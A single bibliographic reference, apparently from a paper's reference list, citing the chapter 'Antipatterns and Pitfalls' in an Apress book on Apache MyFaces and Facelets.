[8] Z. Wadia, M. Marinschek, H. Saleh, and D. Byrne. Antipatterns and Pitfalls. In The Definitive Guide to Apache MyFaces and Facelets, pages 229–269. Apress, 2008.